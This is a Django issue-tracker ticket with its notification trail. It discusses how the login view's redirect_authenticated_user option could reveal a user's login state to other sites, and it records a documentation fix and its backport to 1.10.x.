Django 1.10 introduced `redirect_authenticated_user` to the login views. A
report I came across the other day (https://robinlinus.github.io
/socialmedia-leak/) points out how that redirects on GET for authenticated
users can potentially be used to gain the login state of a user for a
site.
I believe we should warn users about that issue. Reverting
10781b4c6ff981f581157957d221e7621e0bf4ed (#12233) doesn't seem necessary
to me. It is a useful feature if you know you don't serve image files from
those domains.
--
Ticket URL: <https://code.djangoproject.com/ticket/27352>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
* needs_docs: 1 => 0
* has_patch: 0 => 1
Comment:
PR: https://github.com/django/django/pull/7403
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:1>
* stage: Unreviewed => Ready for checkin
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:2>
* status: assigned => closed
* resolution: => fixed
Comment:
In [changeset:"b5fc192b99ce92a7ccad08cca7b59b1a4e7ca230" b5fc192]:
{{{
#!CommitTicketReference repository=""
revision="b5fc192b99ce92a7ccad08cca7b59b1a4e7ca230"
Fixed #27352 -- Doc'd social media fingerprinting consideration with
login's redirect_authenticated_user.
}}}
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:3>
Comment (by Tim Graham <timograham@…>):
In [changeset:"d3ca2907789c348bb132dfd112379df07db0cbbf" d3ca2907]:
{{{
#!CommitTicketReference repository=""
revision="d3ca2907789c348bb132dfd112379df07db0cbbf"
[1.10.x] Fixed #27352 -- Doc'd social media fingerprinting consideration
with login's redirect_authenticated_user.
Backport of b5fc192b99ce92a7ccad08cca7b59b1a4e7ca230 from master
}}}
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:4>